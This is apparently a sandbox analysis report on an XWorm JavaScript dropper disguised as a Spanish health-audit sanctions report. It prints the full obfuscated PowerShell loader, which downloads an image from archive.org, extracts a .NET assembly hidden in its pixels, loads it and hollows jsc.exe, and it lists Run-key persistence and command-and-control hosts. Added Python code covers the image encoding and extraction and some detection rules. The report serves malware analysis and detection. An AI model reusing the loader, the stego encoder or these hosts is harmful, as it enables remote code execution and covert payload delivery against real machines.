Analysis Overview
SHA256
0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1
Threat Level: Known bad
The file NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS was found to be: Known bad.
Malicious Activity Summary
Xworm family
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
System Location Discovery: System Language Discovery
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-02 18:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-02 18:52
Reported
2025-07-02 18:54
Platform
win10v2004-20250610-en
Max time kernel
103s
Max time network
146s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1328 set thread context of 4000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
| PID 2220 set thread context of 1452 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJE
FzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | deadpoolstart.lovestoblog.com | udp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 8.8.8.8:53 | archive.org | udp |
| US | 207.241.224.2:443 | archive.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | deadpoolstart2064.duckdns.org | udp |
| CO | 181.131.217.63:7021 | deadpoolstart2064.duckdns.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
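The archive.org connections in this table are the fetch of the .jpg carrier named in the decoded stage-2 script. That script never parses JPEG: it scans the downloaded bytes for a hard-coded 54-byte BMP header (magic BM, 24 bits per pixel, uncompressed, 100 x 12109 pixels, about 3.6 MB of pixel data, as given by the byte array in the decoded script), hands everything from that offset to System.Drawing.Bitmap, walks GetPixel(x, y) row by row from the top appending R, G and B, reads the first four collected bytes as a little-endian Int32 length and takes that many following bytes as the assembly. The Python below is added here as a worked example; it is neither the sample's code nor part of the report. It reimplements that extraction without System.Drawing, with a matching encoder so the round trip can be exercised on a constructed carrier offline; the encoder handles BMP's bottom-up row storage, BGR byte order and 4-byte row padding, which is what a re-implementation has to get right to reproduce what GetPixel returns.

```python
import struct

BMP_FILE_HEADER = 14
BMP_INFO_HEADER = 40


def build_carrier(payload: bytes, width: int = 100,
                  jpeg_prefix: bytes = b"\xff\xd8\xff\xe0" + b"\x00" * 16) -> bytes:
    """Constructed stand-in for the downloaded .jpg: JPEG-looking bytes followed by
    a 24-bit BMP whose pixels, read R,G,B from the top row down, are a 4-byte
    little-endian length followed by the payload."""
    stream = struct.pack("<i", len(payload)) + payload
    row_bytes = width * 3
    stride = (row_bytes + 3) & ~3               # each stored row is padded to 4 bytes
    height = -(-len(stream) // row_bytes)       # ceiling division
    stream = stream.ljust(height * row_bytes, b"\x00")
    rows = []
    for y in range(height):
        rgb = stream[y * row_bytes:(y + 1) * row_bytes]
        bgr = bytearray()
        for i in range(0, row_bytes, 3):        # file stores B,G,R per pixel
            bgr += bytes((rgb[i + 2], rgb[i + 1], rgb[i]))
        rows.append(bytes(bgr).ljust(stride, b"\x00"))
    pixels = b"".join(reversed(rows))           # positive height: bottom row first
    image_size = stride * height
    file_size = BMP_FILE_HEADER + BMP_INFO_HEADER + image_size
    file_hdr = struct.pack("<2sIHHI", b"BM", file_size, 0, 0, BMP_FILE_HEADER + BMP_INFO_HEADER)
    info_hdr = struct.pack("<IiiHHIIiiII", BMP_INFO_HEADER, width, height, 1, 24, 0,
                           image_size, 3780, 3780, 0, 0)
    return jpeg_prefix + file_hdr + info_hdr + pixels


def find_bmp(blob: bytes) -> int:
    """Offset of the first embedded uncompressed 24-bit BMP header, or -1."""
    pos = 0
    while True:
        pos = blob.find(b"BM", pos)
        if pos < 0 or pos + BMP_FILE_HEADER + BMP_INFO_HEADER > len(blob):
            return -1
        bpp, compression = struct.unpack_from("<HI", blob, pos + 28)
        if bpp == 24 and compression == 0:
            return pos
        pos += 1


def extract_payload(blob: bytes) -> bytes:
    """Reproduce the GetPixel walk: top row first, left to right, R then G then B,
    then a 4-byte little-endian length prefix selects the embedded bytes."""
    start = find_bmp(blob)
    if start < 0:
        raise ValueError("no BMP carrier in data")
    bmp = blob[start:]
    pixel_offset = struct.unpack_from("<I", bmp, 10)[0]
    width, height = struct.unpack_from("<ii", bmp, 18)
    stride = (width * 3 + 3) & ~3
    top_down = height < 0                       # negative height means rows stored top-down
    height = abs(height)
    out = bytearray()
    for y in range(height):                     # y == 0 is the top row for GetPixel
        row_index = y if top_down else height - 1 - y
        base = pixel_offset + row_index * stride
        row = bmp[base:base + width * 3]
        for x in range(width):
            b, g, r = row[3 * x:3 * x + 3]
            out += bytes((r, g, b))
    length = struct.unpack_from("<i", out, 0)[0]
    if length < 0 or 4 + length > len(out):
        raise ValueError("bad length prefix")
    return bytes(out[4:4 + length])


if __name__ == "__main__":
    sample = b"MZ" + bytes(range(256))         # constructed stand-in for the assembly bytes
    carrier = build_carrier(sample)
    recovered = extract_payload(carrier)
    print("carrier bytes:", len(carrier), "recovered:", len(recovered), "match:", recovered == sample)
```

On the real carrier the recovered bytes are what the loader passes to [Reflection.Assembly]::Load, so they should begin with MZ and can be written out as a .dll for a .NET decompiler; the loader's own Replace('A','@').Replace('@','A') round trip changes nothing and can be ignored.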
Files
memory/1328-1-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-0-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-2-0x0000029942190000-0x00000299421B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkfgebzc.fal.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1328-12-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-13-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-14-0x00000299426A0000-0x0000029942A1E000-memory.dmp
memory/1328-15-0x0000029927A50000-0x0000029927A5E000-memory.dmp
memory/1328-17-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
C:\Users\Public\Downloads\agnosticism.js
| MD5 | 9b49b1a2e0327767db6dc4883654dd22 |
| SHA1 | 486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba |
| SHA256 | 761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30 |
| SHA512 | b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206 |
memory/4000-20-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4000-23-0x00000000052E0000-0x000000000537C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 4603c253796ff07ae786a16894b49206 |
| SHA1 | 4c15e20377d861717b0668c1571ca6ad2f773fe6 |
| SHA256 | e2d57c03c72f56be9c7ed107864003befae22a7498ee40bd21ed4e63481c4afe |
| SHA512 | cc9d0aa73b231bc9979b0c1f38a09e549d927caf5bbfe8fd088feabbdd651d0beb301ef1825e027437bdae45eddc26ae03b5bba2e25976051526b47e657f19f7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 81fba9af5c9fbee260bee735e50ffb93 |
| SHA1 | 10648671e56e56b52e0ca50063f0493949e595fb |
| SHA256 | c8e4c56c301eb93c1f3eca54652687455776b2262f5d74b78326c6829b0b16fa |
| SHA512 | 7c973376c1006b4ec7747b65f66017927ddf49bf4dcbed440f82f4511e72a344f6a4d980d41e2a2d19ca5c2ad11952644fa4dfbe98902240a449befa0c0dd710 |
memory/4000-35-0x00000000059F0000-0x0000000005A56000-memory.dmp
memory/4000-36-0x0000000006510000-0x00000000065A2000-memory.dmp
memory/4000-37-0x0000000006B60000-0x0000000007104000-memory.dmp
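Three of the signatures in this run are enough to catch the chain generically rather than by hash: wscript.exe spawning powershell.exe with -w hidden, -ep bypass, FromBase64String and Invoke-Expression; powershell.exe spawning jsc.exe with an empty command line and then setting its thread context (the hollowing target); and a Run value pointing at a .js under C:\Users\Public. The Python below is added here as a worked example and is not part of the report. It expresses those three points as rules over constructed process-creation and registry events shaped like the behavioral1 process tree above, plus benign controls; the event schema is an assumption, and the hosts other than jsc.exe in HOLLOW_HOSTS are an assumption that this report does not itself evidence.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str         # full path of the new process
    parent_image: str  # full path of its parent
    cmdline: str


@dataclass
class RegEvent:
    image: str  # process that wrote the value
    key: str    # full value path, e.g. HKCU\...\Run\Path
    value: str  # data written


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
PS_LOADER_MARKERS = ("-w hidden", "-ep bypass", "frombase64string", "invoke-expression")
# jsc.exe is what this sample hollows; the others are an assumption about
# similar no-argument .NET framework binaries, not something this report shows.
HOLLOW_HOSTS = {"jsc.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "aspnet_compiler.exe"}
RUN_KEY_RE = re.compile(r"\\currentversion\\run\\", re.I)
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")


def rule_script_host_to_hidden_powershell(ev: ProcEvent) -> bool:
    if basename(ev.parent_image) not in SCRIPT_HOSTS or basename(ev.image) != "powershell.exe":
        return False
    low = ev.cmdline.lower()
    return sum(marker in low for marker in PS_LOADER_MARKERS) >= 3


def rule_powershell_to_bare_dotnet_host(ev: ProcEvent) -> bool:
    host = basename(ev.image)
    if basename(ev.parent_image) != "powershell.exe" or host not in HOLLOW_HOSTS:
        return False
    # Command line is only the quoted image path: a compiler started with no
    # input does no legitimate work, it is a suspended injection target.
    return ev.cmdline.strip().strip('"').lower().endswith(host)


def rule_run_key_to_script_in_public(ev: RegEvent) -> bool:
    if not RUN_KEY_RE.search(ev.key):
        return False
    # Report output escapes backslashes; normalise before matching.
    target = ev.value.strip('"').replace("\\\\", "\\").lower()
    return target.endswith(SCRIPT_EXT) and "\\users\\public\\" in target


def evaluate(procs, regs):
    alerts = []
    for ev in procs:
        for rule in (rule_script_host_to_hidden_powershell, rule_powershell_to_bare_dotnet_host):
            if rule(ev):
                alerts.append({"rule": rule.__name__, "image": ev.image, "detail": ev.cmdline})
    for ev in regs:
        if rule_run_key_to_script_in_public(ev):
            alerts.append({"rule": rule_run_key_to_script_in_public.__name__, "image": ev.image, "detail": ev.value})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
JSC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
WSCRIPT = r"C:\Windows\system32\wscript.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events mirroring the behavioral1 tree, plus benign controls.
PROC_EVENTS = [
    ProcEvent(PS, WSCRIPT, '"' + PS + '" -w hidden -noprofile -ep bypass -c "$b=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a));Invoke-Expression $b"'),
    ProcEvent(JSC, PS, '"' + JSC + '"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS, r'"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"'),
    ProcEvent(PS, EXPLORER, '"' + PS + '" -NoProfile'),                          # benign: interactive shell
    ProcEvent(JSC, r"C:\Windows\System32\cmd.exe", '"' + JSC + '" /nologo /out:app.exe app.js'),  # benign: real compile
]
REG_EVENTS = [
    RegEvent(PS, r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Path", r'"C:\\Users\\Public\\Downloads\\agnosticism.js"'),
    RegEvent(EXPLORER, r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive", r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for alert in evaluate(PROC_EVENTS, REG_EVENTS):
        print(alert["rule"], "->", alert["image"])
```

The second rule is deliberately narrow (parent powershell.exe, empty command line); pairing it with the SetThreadContext or WriteProcessMemory telemetry shown above, where the sensor exposes it, turns a suspicious spawn into a confirmed hollowing.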
Analysis: behavioral2
Detonation Overview
Submitted
2025-07-02 18:52
Reported
2025-07-02 18:54
Platform
win11-20250619-en
Max time kernel
136s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1620 set thread context of 4552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
| PID 1308 set thread context of 5004 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
